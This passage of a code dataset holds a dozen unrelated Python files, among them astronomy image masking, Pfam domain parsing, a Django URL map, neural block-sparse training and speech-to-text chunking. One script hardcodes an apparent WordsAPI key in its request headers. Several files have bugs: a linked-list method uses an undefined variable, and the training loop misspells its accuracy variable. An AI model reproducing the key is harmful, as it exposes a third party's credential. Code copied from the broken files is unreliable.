map sizes do not match')\n return\n self.rmsmap = rms\n frms.close()\n else:\n self.rmsmap = None\n self.filth = None\n\n def region(self, regfile):\n freg = open(regfile)\n lreg = freg.readlines()\n freg.close()\n nsrc = 0\n nreg = len(lreg)\n if self.exposure is None:\n print('No exposure given')\n return\n expo = np.copy(self.exposure)\n y, x = np.indices(self.axes)\n regtype = None\n for i in range(nreg):\n if 'fk5' in lreg[i]:\n regtype = 'fk5'\n\n if regtype is None:\n print('Error: invalid format')\n return\n for i in range(nreg):\n if 'circle' in lreg[i]:\n vals = lreg[i].split('(')[1].split(')')[0]\n if regtype == 'fk5':\n xsrc = float(vals.split(',')[0])\n ysrc = float(vals.split(',')[1])\n rad = vals.split(',')[2]\n if '\"' in rad:\n rad = float(rad.split('\"')[0]) / self.pixsize / 60.0\n else:\n if \"'\" in rad:\n rad = float(rad.split(\"'\")[0]) / self.pixsize\n else:\n rad = float(rad) / self.pixsize * 60.0\n wc = np.array([[xsrc, ysrc]])\n pixcrd = self.wcs_inp.wcs_world2pix(wc, 1)\n xsrc = pixcrd[0][0] - 1.0\n ysrc = pixcrd[0][1] - 1.0\n else:\n xsrc = float(vals.split(',')[0])\n ysrc = float(vals.split(',')[1])\n rad = float(vals.split(',')[2])\n boxsize = np.round(rad + 0.5).astype(int)\n intcx = np.round(xsrc).astype(int)\n intcy = np.round(ysrc).astype(int)\n xmin = np.max([intcx - boxsize, 0])\n xmax = np.min([intcx + boxsize + 1, self.axes[1]])\n ymin = np.max([intcy - boxsize, 0])\n ymax = np.min([intcy + boxsize + 1, self.axes[0]])\n rbox = np.hypot(x[ymin:ymax, xmin:xmax] - xsrc, y[ymin:ymax, xmin:xmax] - ysrc)\n src = np.where(rbox < rad)\n expo[ymin:ymax, xmin:xmax][src] = 0.0\n nsrc = nsrc + 1\n\n print('Excluded %d sources' % nsrc)\n self.exposure = expo\n\n def dmfilth(self, outfile=None):\n if self.img is None:\n print('No data given')\n return\n chimg = np.where(self.exposure == 0.0)\n imgc = np.copy(self.img)\n imgc[chimg] = 0.0\n print('Applying high-pass filter')\n smoothing_scale = 25\n gsb = gaussian_filter(imgc, smoothing_scale)\n gsexp = gaussian_filter(self.exposure, smoothing_scale)\n img_smoothed = np.nan_to_num(np.divide(gsb, gsexp)) * self.exposure\n print('Interpolating in the masked regions')\n y, x = np.indices(self.axes)\n nonz = np.where(img_smoothed > 0.0)\n p_ok = np.array([x[nonz], y[nonz]]).T\n vals = img_smoothed[nonz]\n int_vals = np.nan_to_num(griddata(p_ok, vals, (x, y), method='cubic'))\n print('Filling holes')\n area_to_fill = np.where(np.logical_and(int_vals > 0.0, self.exposure == 0))\n dmfilth = np.copy(self.img)\n dmfilth[area_to_fill] = np.random.poisson(int_vals[area_to_fill])\n self.filth = dmfilth\n if outfile is not None:\n hdu = fits.PrimaryHDU(dmfilth)\n hdu.header = self.header\n hdu.writeto(outfile, overwrite=True)\n print('Dmfilth image written to file ' + outfile)","sub_path":"pycfiles/pyproffit-0.4.3-py3.7/data.cpython-37.py","file_name":"data.cpython-37.py","file_ext":"py","file_size_in_byte":6832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"46850067","text":"import os\n\nimport requests\n\nimport datetime\n\ndef __download_word(word):\n if os.path.exists('wordsapi/{}.txt'.format(word)):\n return \"already exists\"\n \n try:\n headers = {\n \"X-Mashape-Key\": \"cJEf2iokzbmshxtkkzKrYjxR2ANkp16Jv6Vjsn5cKyHkbdwBCK\",\n \"Accept\": \"application/json\"\n }\n url = 'https://wordsapiv1.p.mashape.com/words/' + word\n r = requests.get(url, headers=headers)\n \n with open('wordsapi/{}.txt'.format(word), 'w', encoding='utf-8') as fout:\n fout.write(r.content.decode())\n return \"download successfully\"\n except Exception as e:\n return e\n\n\ndef download(word_list):\n length = len(word_list)\n log = \"\\n\\n===\" + str(datetime.datetime.now()) + \"===\\n\\n\"\n log_temp = \"{word}: {state}\\n\"\n with open('diff_downloaded.txt', 'a', encoding='utf-8') as fout:\n for i, w in zip(range(1, length + 1), word_list):\n fout.write(w + '\\n')\n print(\"{:>4d}/{}: {}\".format(i, length, w))\n ret = __download_word(w)\n log += log_temp.format(word=w, state=ret)\n print(\"\\t\" + str(ret))\n with open('download_log.txt', 'a', encoding='utf-8') as fout:\n fout.write(log)\n \ndef download_other_1208():\n with open(\"to_wordsapi.txt\", \"r\", encoding=\"utf-8\") as fin:\n t = fin.read()\n list_o = set(t.split('\\n'))\n with open('diff_downloaded.txt', 'r', encoding='utf-8') as fin:\n diff_downloaded = fin.read().split('\\n')\n i = 0\n cnt = 0\n targets = list(set(list_o) - set(diff_downloaded))\n\n log = \"\\n\\n===\" + str(datetime.datetime.now()) + \"===\\n\\n\"\n log_temp = \"{word}: {state}\\n\"\n with open('diff_downloaded.txt', 'a', encoding='utf-8') as fout:\n while cnt < 2450 and i < len(targets):\n w = targets[i]\n fout.write(w + '\\n')\n print(cnt, w)\n ret = __download_word(w)\n log += log_temp.format(word=w, state=ret)\n print(\"\\t\" + str(ret))\n if ret == \"download successfully\":\n cnt += 1\n i += 1\n \n with open('download_log.txt', 'a', encoding='utf-8') as fout:\n fout.write(log)\n \ndef download_other_1210():\n with open(\"to_wordsapi_1210.txt\", \"r\", encoding=\"utf-8\") as fin:\n t = fin.read()\n targets = t.split('\\n')\n\n log = \"\\n\\n===\" + str(datetime.datetime.now()) + \"===\\n\\n\"\n log_temp = \"{word}: {state}\\n\"\n i = 0\n cnt = 0\n while cnt < 2450 and i < len(targets):\n w = targets[i]\n print(cnt, w)\n ret = __download_word(w)\n log += log_temp.format(word=w, state=ret)\n print(\"\\t\" + str(ret))\n if ret == \"download successfully\":\n cnt += 1\n i += 1\n \n with open('download_log.txt', 'a', encoding='utf-8') as fout:\n fout.write(log)\n \n \n\nif __name__ == \"__main__\":\n '''\n with open('diff.txt', 'r', encoding='utf-8') as fin:\n diff = fin.read().split('\\n')\n with open('diff_downloaded.txt', 'r', encoding='utf-8') as fin:\n diff_downloaded = fin.read().split('\\n')\n remain = list(set(diff) - set(diff_downloaded))\n if len(remain) < 2450:\n download(remain)\n else:\n download(remain[:2450])\n '''\n download_other_1210()\n","sub_path":"download_wordsapi.py","file_name":"download_wordsapi.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"421428721","text":"import numpy as np\nimport scipy as sp\nimport matplotlib.pyplot as plt\nimport pickle\nimport datetime\nimport csv\nimport os\nimport math\n\n# SETUP\npf_loc = '../../data/pfams/Pfam-A.regions.tsv'\nout_loc = '/'.join(pf_loc.split('/')[0:-1]) + '/'\ndigits = 6\nbase = 16\nalphabet = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'\nordermag = np.array([base**i for i in range(digits)])\ncharkey = dict(zip(alphabet, range(len(alphabet))))\nhash2 = lambda x: int(np.dot(np.array([charkey[c] for c in x[2][:digits]]), ordermag))\n\nname_digits = 4 # digits in name; 5 for pfams, 4 for clans\n# power must be less than (but shouldn't be by much) number of generated digits, math.log(10**name_digits, 2)*2\n# previously, chosen 24 for 5 digits (33 max), 20 for 4 digits (26 max)\nshsize = 2**20\nndigit = int(round(math.log(shsize, 2)))\ndef hashp(x):\n bstr = [bin(int(x[i][-name_digits:], base=10))[2:] for i in range(len(x))]\n bstrp = ['0'*(max([int(math.ceil(float(ndigit)/float(len(x)))) - len(el), 0])) + el for el in bstr]\n hp = int(''.join([''.join([bstrp[i][-j] for i in range(len(x))])\n for j in range(1, 1+int(math.ceil(ndigit/float(len(x)))))])[0:ndigit], base=2)\n return hp\n\nthsnow = datetime.datetime.now()\ntimestr = ( str(thsnow.month) + '-' + str(thsnow.day) + '-' +\n str(thsnow.year) + '_' + str(thsnow.hour) + 'h' + str(thsnow.minute) + 'm')\n\n# step 1: hash\npf_f = open(pf_loc, 'r')\npf_r = csv.reader(pf_f, delimiter='\\t')\ncounts = [[]]*(base**digits)\nfor index, row in enumerate(pf_r):\n if index > 0:\n hashi = hash2(row)\n if counts[hashi] == []:\n counts[hashi] = [[row[0], 1]]\n else:\n found = 0\n for pf in counts[hashi]:\n if pf[0] == row[0]:\n pf[1] += 1\n found = 1\n break\n if found == 0:\n counts[hashi].append([row[0], 1])\npf_f.close()\n\nout_counts = open(out_loc + 'hashing_' + timestr + '.pkl', 'wb')\npickle.dump(counts, out_counts)\npickle.dump(digits, out_counts)\npickle.dump(base, out_counts)\nout_counts.close()\n\n# step 2: count number of proteins\nnum_proteins = 0\nfor hashline in range(len(counts)):\n num_proteins += len(counts[hashline])\n\n# step 3: index by protein location\nprot_names = ['']*num_proteins\nprot_pfams = [[]]*num_proteins\ninum = 0\nfor hashline in range(len(counts)):\n for protdescr in counts[hashline]:\n prot_names[inum] = protdescr[0]\n prot_pfams[inum] = []\n inum += 1\nprot_dict = dict(zip(prot_names, range(len(prot_names))))\n\n# step 4: fill in pfams\npf_f = open(pf_loc, 'r')\npf_r = csv.reader(pf_f, delimiter='\\t')\nfor index, row in enumerate(pf_r):\n if index > 0:\n prot_pfams[prot_dict[row[0]]].append([row[4], int(row[5]), int(row[6])])\npf_f.close()\n\n# step 5: sort pfams within proteins\nfor proti in range(len(prot_pfams)):\n prot_pfams[proti].sort(key=lambda x: x[1])\n\n# step 6: list pfams\npf_f = open(pf_loc, 'r')\npf_r = csv.reader(pf_f, delimiter='\\t')\npfam_list = []\nlastrow = [0]*5\nfor index, row in enumerate(pf_r):\n if index > 0:\n if row[4] != lastrow[4]:\n pfam_list.append([row[4], 1])\n else:\n pfam_list[-1][1] += 1\n lastrow = row\npf_f.close()\npfam_dict = dict(zip([pfam_list[i][0] for i in range(len(pfam_list))], range(len(pfam_list))))\n\nout_counts = open(out_loc + 'indices_' + timestr + '.pkl', 'wb')\npickle.dump(prot_names, out_counts)\npickle.dump(prot_pfams, out_counts)\npickle.dump(prot_dict, out_counts)\npickle.dump(pfam_list, out_counts)\npickle.dump(pfam_dict, out_counts)\nout_counts.close()\n\n# add clan information\ncl_loc = '../../data/pfams/Pfam-A.clans.tsv'\ncl_f = open(cl_loc, 'r')\ncl_r = csv.reader(cl_f, delimiter='\\t')\nclan_list = []\npf2cl_list = []\nclan_descr = []\nfor index, row in enumerate(cl_r):\n if row[1] != '':\n clan = row[1]\n else:\n clan = row[0]\n # *** fix! make non-redundant. wasting memory this way ***\n clan_list.append(clan)\n pf2cl_list.append([row[0], clan])\n clan_descr.append(row[4])\ncl_f.close()\nclan_dict = dict(zip(clan_list, range(len(clan_list))))\npfam2clan = dict(pf2cl_list)\nprot_clans = []\nfor proti, prot in enumerate(prot_pfams):\n prot_clans.append([])\n for dom in prot:\n prot_clans[proti].append([pfam2clan[dom[0]], dom[1], dom[2]])\n\nout_counts = open(out_loc + 'clan_indices_' + timestr + '.pkl', 'wb')\npickle.dump(prot_names, out_counts)\npickle.dump(prot_clans, out_counts)\npickle.dump(prot_dict, out_counts)\npickle.dump(clan_list, out_counts)\npickle.dump(clan_dict, out_counts)\npickle.dump(clan_descr, out_counts) #** new\npickle.dump(pfam2clan, out_counts)\nout_counts.close()\n\n# step 7: create clan linkage graphs\n# ***this should be fixed! lots of redundancies; clan_list is too long***\nlink_to = [[] for el in range(len(clan_list))]\nfor proti in range(len(prot_clans)):\n for pfi in range(len(prot_clans[proti]) - 1):\n if len(link_to[clan_dict[prot_clans[proti][pfi][0]]]) == 0:\n link_to[clan_dict[prot_clans[proti][pfi][0]]] = [[clan_dict[prot_clans[proti][pfi + 1][0]], 1]]\n continue\n found = 0\n for ltoi in link_to[clan_dict[prot_clans[proti][pfi][0]]]:\n if ltoi[0] == clan_dict[prot_clans[proti][pfi + 1][0]]:\n ltoi[1] += 1\n found = 1\n break\n if found == 0:\n link_to[clan_dict[prot_clans[proti][pfi][0]]].append([clan_dict[prot_clans[proti][pfi + 1][0]], 1])\n #print(link_to)\n\nout_counts = open(out_loc + 'links_' + timestr + '.pkl', 'wb')\npickle.dump(link_to, out_counts)\npickle.dump(clan_list, out_counts)\nout_counts.close()\n\n## summary statistics 1:\n# domains per protein\ndom_per_prot = [len(prot) for prot in prot_clans]\n\n# unique domains per protein\nudom_per_prot = [len(set([pdet[0] for pdet in prot])) for prot in prot_clans]\n\n# pfam coverage -> gaps between protein domains (can't get full length)\npf_gaps = []\nfor prot in prot_clans:\n for domi in range(len(prot)-1):\n pf_gaps.append(prot[domi+1][1] - prot[domi][2])\n\n# decision entropy\ndec_entropy = np.zeros(len(prot_clans))\nfor proti, prot in enumerate(prot_clans):\n if len(prot) < 2:\n continue\n pfvec = [pdet[0] for pdet in prot]\n uset = [el for el in set(pfvec)]\n umult = [sum([pfi == pfj for pfj in pfvec]) for pfi in uset]\n for pfi_i, pfi in enumerate(uset):\n nextvec = []\n for pfj_i, pfj in enumerate(pfvec[:-1]):\n if pfj == pfi:\n nextvec.append(pfvec[pfj_i+1])\n unext = [el for el in set(nextvec)]\n unextpi = [sum([pfi == pfj for pfj in nextvec])/float(len(nextvec)) for pfi in unext]\n dec_entropy[proti] += sum([-math.log(um)*um for um in unextpi])*umult[pfi_i]\n\nout_summary1 = open(out_loc + 'summary_stats1_' + timestr + '.pkl', 'wb')\npickle.dump(dom_per_prot, out_summary1)\npickle.dump(udom_per_prot, out_summary1)\npickle.dump(pf_gaps, out_summary1)\npickle.dump(dec_entropy, out_summary1)\npickle.dump(prot_names, out_summary1)\nout_summary1.close()\n\n\n# step 8: hash adjoining clans\nnhash = 2\nsethash = [[] for si in range(shsize)]\nhashloc = [[] for si in range(shsize)]\nfor proti, prot in enumerate(prot_clans):\n for domi in range(len(prot)-1):\n thsrng = range(domi, domi + nhash)\n doml = [prot[hi][0] for hi in thsrng]\n skey = doml #[int(x[-name_digits:]) for x in doml]\n\n # sort, to make sure all orders get mapped to same place\n sdomi = [x for (y,x) in sorted(zip(skey, thsrng))]\n sdoml = [x for (y,x) in sorted(zip(skey, doml))]\n hashi = hashp(sdoml)\n\n if len(hashloc[hashi]) == 0:\n hashloc[hashi] = [sdoml]\n sethash[hashi] = [[[proti, sdomi]]]\n else:\n found = False\n for subi, sub in enumerate(hashloc[hashi]):\n if sub == sdoml:\n sethash[hashi][subi].append([proti, sdomi])\n found = True\n break\n if found == False:\n hashloc[hashi].append(sdoml)\n sethash[hashi].append([[proti, sdomi]])\n\n# compile pfam pairs list from hash table\npfpairs = []\npfpairlocs = []\npairmap = [[] for el in clan_list]\ncount = 0\nfor hsi in range(shsize):\n for hsj in range(len(hashloc[hsi])):\n pfpairs.append(hashloc[hsi][hsj])\n pfpairlocs.append(sethash[hsi][hsj])\n pairmap[clan_dict[hashloc[hsi][hsj][0]]].append(count)\n if hashloc[hsi][hsj][0] != hashloc[hsi][hsj][1]:\n pairmap[clan_dict[hashloc[hsi][hsj][1]]].append(count)\n count += 1\n\nout_pairs = open(out_loc + 'pfam_pairs_' + timestr + '.pkl', 'wb')\npickle.dump(pfpairs, out_pairs)\npickle.dump(pfpairlocs, out_pairs)\npickle.dump(pairmap, out_pairs)\nout_pairs.close()\n\n## summary statistics 2:\n# count incidence of adjacent pairs of domains in either order\nordercounts = np.zeros([len(pfpairs), 2])\nfor pfi in range(len(pfpairlocs)):\n for loci in range(len(pfpairlocs[pfi])):\n if pfpairlocs[pfi][loci][1][1] > pfpairlocs[pfi][loci][1][0]:\n ordercounts[pfi][0] += 1\n else:\n ordercounts[pfi][1] += 1\n\nout_summary2 = open(out_loc + 'summary_stats2_' + timestr + '.pkl', 'wb')\npickle.dump(ordercounts, out_summary2)\npickle.dump(pfpairs, out_summary2)\nout_summary2.close()\n","sub_path":"PfamLogic/DomainParse_imp3.py","file_name":"DomainParse_imp3.py","file_ext":"py","file_size_in_byte":9318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"252694753","text":"# Node class \nclass Node: \n \n # Function to initialise the node object \n def __init__(self, data): \n self.data = data\n self.next = None\n \nclass LinkedList: \n \n def __init__(self): \n self.head = None\n \n def push(self, new_data): \n new_node = Node(new_data)\n new_node.next = self.head\n self.head = new_node\n \n # Function to get the middle of \n # the linked list \n def printMiddle(self): \n # first pointer to jump to element leaving one immediately after it\n # since second pointer reaches exactly the mid when first reaches the end return second pointers data\n twostep_ptr = self.head \n second_ptr = self.head\n \n if self.head:\n while(first_ptr and first_ptr.next):\n first_ptr = first_ptr.next.next\n second_ptr = second_ptr.next\n return second_ptr.data\n# Driver code \nlist1 = LinkedList() \nlist1.push(5) \nlist1.push(4) \nlist1.push(2) \nlist1.push(3) \nlist1.push(1) \nlist1.push(6)\nlist1.push(7)\nlist1.printMiddle() \n","sub_path":"Exercise_3.py","file_name":"Exercise_3.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"302837543","text":"\"\"\"ouragan_opp URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import include ,path\nfrom django.views.generic import TemplateView\nfrom ouragan.views import ContactView\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', TemplateView.as_view(template_name='pages/index.html'), name='home'),\n path('contact/', ContactView.as_view(template_name='pages/contact.html'), name='contact'),\n path('opportunites/', TemplateView.as_view(template_name='pages/opportunites.html'), name='opportunites'),\n path('opportunites/m', TemplateView.as_view(template_name='pages/m.html'), name='m'),\n path('opportunites/e', TemplateView.as_view(template_name='pages/e.html'), name='e'),\n path('opportunites/a', TemplateView.as_view(template_name='pages/a.html'), name='a'),\n path('team/', TemplateView.as_view(template_name='pages/team.html'), name='team'),\n path('eagle_pub/', TemplateView.as_view(template_name='pages/eagle_pub.html'), name='eagle_pub'),\n path('f/', include('formation.urls')),\n]\n","sub_path":"ouragan_opp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"315759823","text":"import torch\nfrom copy import deepcopy\nimport numpy as np\nfrom torch.optim import Adam\nfrom torch.nn import CrossEntropyLoss\nfrom torch.autograd import Variable\nfrom torchvision.datasets import MNIST, FashionMNIST\nfrom utils.misc import tn\nfrom utils.wrapping import wrap\n\nEPOCHS = 15\n\ndef forward(model, dl, lamb=0, optimizer=None):\n criterion = CrossEntropyLoss()\n acc_sum = 0\n tot = 0\n for i, (images, labels) in enumerate(dl):\n print(i)\n images = wrap(Variable(images, requires_grad=False))\n labels = wrap(Variable(labels, requires_grad=False))\n output = model(images)\n if optimizer is not None:\n original_loss = criterion(output, labels)\n penalized_loss = original_loss + float(lamb) * model.loss()\n optimizer.zero_grad()\n penalized_loss.backward()\n optimizer.step()\n\n acc = (output.max(1)[1] == labels).float().sum()\n tot += len(labels)\n acc_sum += acc\n\n acc = tn(acc_sum.data / tot)\n return acc\n\ndef train_until_convergence(model, train_dl, val_dl, lamb, patience=3, min_epochs=2):\n best_model = None\n best_score = (-np.inf, 0)\n early_stop = 0\n\n print('lambda', lamb)\n\n optimizer = Adam(model.parameters())\n\n while True:\n train_acc = forward(model, train_dl, lamb, optimizer)\n current_accuracy = forward(model, val_dl)\n capacities = model.training_component().get_capacities().data.cpu().numpy()\n current_score = (-capacities.sum(), current_accuracy)\n\n print(train_acc, current_accuracy, capacities)\n\n if model.has_collapsed():\n raise StopIteration('Model collapsed')\n elif min_epochs > 0:\n min_epochs -=1\n elif current_score > best_score:\n best_model = deepcopy(model)\n best_score = current_score\n early_stop = 0\n elif early_stop == patience - 1:\n return best_score[1], best_model\n else:\n early_stop += 1\n\ndef train(gen_block, base_model, train_dl, val_dl, test_dl, start_lamb=10, lamb_decay=10, max_patience=4, default_block_size=25, min_lambda=1e-7, max_block_size=100):\n block_size = default_block_size\n lamb = start_lamb\n val_accuracies = []\n test_accuracies = []\n Global_best_acc = 0\n while block_size <= max_block_size: # Add blocks\n current_model = base_model.next_block(gen_block(block_size))\n best_model = None\n while True: # Find Grip\n try:\n current_accuracy, current_model = train_until_convergence(current_model, train_dl, val_dl, lamb, patience=max_patience)\n break\n except StopIteration:\n lamb /= lamb_decay\n if lamb < min_lambda:\n return val_accuracies, test_accuracies, base_model\n current_model = base_model.next_block(gen_block(block_size))\n best_acc = current_accuracy\n best_model = deepcopy(current_model)\n while False: # Optimize\n best_acc = current_accuracy\n if best_acc < global_best_acc:\n break\n best_model = deepcopy(current_model)\n lamb *= lamb_decay\n try:\n current_accuracy, current_model = train_until_convergence(current_model, train_dl, val_dl, lamb, patience=max_patience)\n except StopIteration:\n current_accuracy = 0\n if current_accuracy < best_acc:\n break\n else:\n best_acc = current_accuracy\n if best_acc > global_best_acc: # We did improve the model\n print('did improve')\n base_model = best_model # We build on top of this block\n block_size = max(block_size, int(min(max_block_size, 3 * tn(base_model.training_component().get_capacities().max().data))))\n global_best_acc = best_acc\n val_accuracies.append(best_acc)\n test_acc = forward(base_model, test_dl)\n print('TEST ACC:', test_acc)\n test_accuracies.append(test_acc)\n else:\n print('did not improve')\n lamb /= lamb_decay\n if lamb <= min_lambda: # We can only increase the size\n break\n return val_accuracies, test_accuracies, base_model\n","sub_path":"algorithms/block_sparse_training.py","file_name":"block_sparse_training.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"417737847","text":"_author = \"Vinodh Krishna Erramachetty Munaswamy\"\n\nfor i in range(1,11):\n print(\"Value of i is {0:2}\".format(i))\n\nnumber = \"8,999,888,777,666\"\nfor i in range(0,len(number)):\n print(number[i])\n\nfor i in range(0,len(number)):\n if number[i] in \"0123456789\":\n print(number[i])\n\nfor i in range(0,len(number)):\n if number[i] in \"0123456789\":\n print(number[i],end=\"\")\nprint(\"\")\ncleanednumber=\"\"\nfor i in range(0,len(number)):\n if number[i] in \"0123456789\":\n cleanednumber = cleanednumber + number[i]\nnewnumber = int(cleanednumber)\nprint(\"Actual integer is {}\".format(newnumber))\n\nnumber1 = \"9,111,222,333,444,555,666\"\nfor char1 in number1:\n if char1 in \"0123456789\":\n print(char1,end=\"\")\nprint(\"\")\n\nnumber2 = \"1,22,33,44,55,66,77\"\nconstring = \"\"\nfor char2 in number2:\n if char2 in \"0123456789\":\n constring = constring + char2\nconintstring = int(constring)\nprint(conintstring)\n\nfor i in range(1,10):\n for j in range(1,5):\n print(\"Inner Loop\")\n print(\"Outer loop*******\")\n\nfor i in range(0,101):\n if (i%7 == 0):\n print(i)\n# print(i//7)","sub_path":"BasicPrograms/ForLoopBasic.py","file_name":"ForLoopBasic.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"156819715","text":"# 부모없는=루트노드 찾기\n# 루트->후보로 이동 후\n# 후보에서 다시 dfs->visited에 없는거따라 내려감\n# count 후 리턴\n\nimport sys\nsys.stdin = open('5174.subtree.txt')\n\ndef dfs(start, graph):\n visit=[]\n stack=[]\n\n stack.append(start)\n\n while stack:\n node=stack.pop()\n if node==0:\n break\n if node not in visit:\n visit.append(node)\n stack.extend(graph[node])\n\n return visit\n\n\nT=int(input())\n\nfor test_case in range(1, T+1):\n E, N=map(int, input().split())\n data=list(map(int, input().split()))\n mat=[[] for _ in range(E+2)]\n for i in range(len(data)):\n if i%2==0:\n mat[data[i]].append(data[i+1])\n print(mat)\n\n ans=len(dfs(N, mat))\n print(f'#{test_case} {ans}')","sub_path":"SWEA/수업/5174.subtree.py","file_name":"5174.subtree.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"139829882","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\n\nfrom .models import Employee, Punch\n\ndef valid_user(fn):\n def _valid(request, **kwargs):\n if request.session.get('user_name', default=None) == None:\n return HttpResponseRedirect(reverse('attendence:login', args=None))\n else:\n punch(request) \n return fn(request, **kwargs)\n return _valid \n\ndef punch(request):\n user_name = request.session.get('user_name')\n ip = request.get_host()\n emp = Employee.objects.filter(user_name=user_name)[0]\n Punch.objects.create(employee=emp, IP=ip, entry_user=emp)","sub_path":"basic/attendence/decrator.py","file_name":"decrator.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"494923715","text":"#!/usr/bin/env python3.6\nimport subprocess,os\nfrom pyfiglet import Figlet\nfrom termcolor import colored\nfrom tabletext import to_text\n\n\ndef check_status():\n \n telg = str(subprocess.check_output('systemctl status influxdb | grep Active',shell=True)).split()\n influxdb =str(subprocess.check_output('systemctl status telegraf | grep Active',shell=True)).split()\n \n table = [[\"InfluxDB\",\"Service:\"+influxdb[2]],\n [\"Telegraf\",\"Service:\"+telg[2]]]\n \n return to_text(table,padding=(2,10))\n\n\n\nif __name__==\"__main__\":\n \n subprocess.call('clear')\n \n \n print(colored(Figlet(font='roman').renderText('Influx_Angie'),\"yellow\"))\n print(check_status())\n print(input())\n \n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"244509452","text":"import sys\nimport numpy as np\nimport sklearn\nimport sklearn.manifold\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport random\nimport time\nfrom operator import itemgetter \n\nif len(sys.argv) == 1:\n npzfile = np.load('result_reduction.npz')\n indices = npzfile['indices']\n X_2d = npzfile['X_2d']\n X_2d = np.split(X_2d, indices)\n samples = random.sample(range(len(X_2d)), 10)\n selected = np.concatenate(itemgetter(*samples)(X_2d))\n\n fig, ax = plt.subplots()\n lines = [ax.plot([], [], '+-', label=str(ind+1))[0] for ind in samples]\n texts = [ax.text(0,0,'') for ind in samples]\n plt.legend()\n ax.set_xlim([selected[:,0].min(), selected[:,0].max()])\n ax.set_ylim([selected[:,1].min(), selected[:,1].max()])\n\n #def init():\n # for line in lines:\n # line.set_data([],[])\n # return lines\n\n def animate(count):\n modified = []\n for line, text, ind in zip(lines, texts, samples):\n if count <= len(X_2d[ind]):\n line.set_data(X_2d[ind][:count, 0], X_2d[ind][:count, 1])\n text.set_position(X_2d[ind][count-1])\n text.set_text(str(count-1))\n modified.append(line)\n modified.append(text)\n return modified\n\n ani = animation.FuncAnimation(fig, animate, \\\n blit=False, interval=200, save_count=120)\n ani.save('movie.mp4')\n plt.show()\n\nelse:\n features = []\n indices = []\n index_cur = 0\n for filepath in sys.argv[1:]:\n feature = np.load(filepath)\n start = feature.shape[0]//4\n stop = feature.shape[0]//4*3\n feature = feature[start:stop,:]\n index_cur += feature.shape[0]\n features.append(feature)\n indices.append(index_cur)\n indices.pop()\n X = np.concatenate(features)\n print('collected '+str(len(features))+' files, ' \\\n + str(X.shape[0])+' features')\n reduction = sklearn.manifold.Isomap(n_components=2)\n #reduction = sklearn.manifold.TSNE(n_components=2)\n X_2d = reduction.fit_transform(X)\n np.savez('result_reduction.npz', indices=indices, X=X, X_2d=X_2d)\n print('dim reduction fitted and saved')\n","sub_path":"dim_reduction.py","file_name":"dim_reduction.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"274909463","text":"import os\nimport re\nimport json\nimport speech_recognition as sr\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('input_dir', type=str, help='directory with all the chunk mp3 files')\nparser.add_argument('language', type=str, help='language code for speech recognition. example hi-In,bn-In')\nargs = parser.parse_args()\n\ninput_file_format = \".wav\"\noutput_json_file = os.path.join(args.input_dir,\"text_detected.json\")\n\ndef atoi(text):\n return int(text) if text.isdigit() else text\ndef natural_keys(text):\n return [ atoi(c) for c in re.split(r'(\\d+)', text) ] \n\nall_audio_chunks = []\nfor file in os.listdir(args.input_dir):\n if file.endswith(input_file_format):\n all_audio_chunks.append(file)\n\nall_audio_chunks.sort(key=natural_keys)\n\noutput_text_dict = {\"fragments\":[]}\n\nspeech_recognizer = sr.Recognizer()\n\nfor i,file in enumerate(all_audio_chunks):\n with sr.AudioFile(os.path.join(args.input_dir,file)) as source:\n text = speech_recognizer.listen(source)\n time_start = os.path.splitext(file)[0].split(\"_\")[1].split(\"-\")[0]\n time_end = os.path.splitext(file)[0].split(\"_\")[1].split(\"-\")[1]\n try:\n text_output = speech_recognizer.recognize_google(text,language=args.language) \n print(\"Speech to text ...{}\".format(file)) \n except:\n text_output = \" \"\n \n output_text_dict[\"fragments\"].append({\"begin\":time_start,\\\n \"end\": time_end,\\\n \"id\": i,\\\n \"language\": args.language[:2],\n \"lines\": [text_output]})\n # output_text_list.append({'time_start':time_start,'time_end':time_end,'text':text_output})\n\nwith open(output_json_file, 'w', encoding='utf8') as f:\n json.dump(output_text_dict, f, ensure_ascii=False)\n\n\n","sub_path":"speech_to_text.py","file_name":"speech_to_text.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} 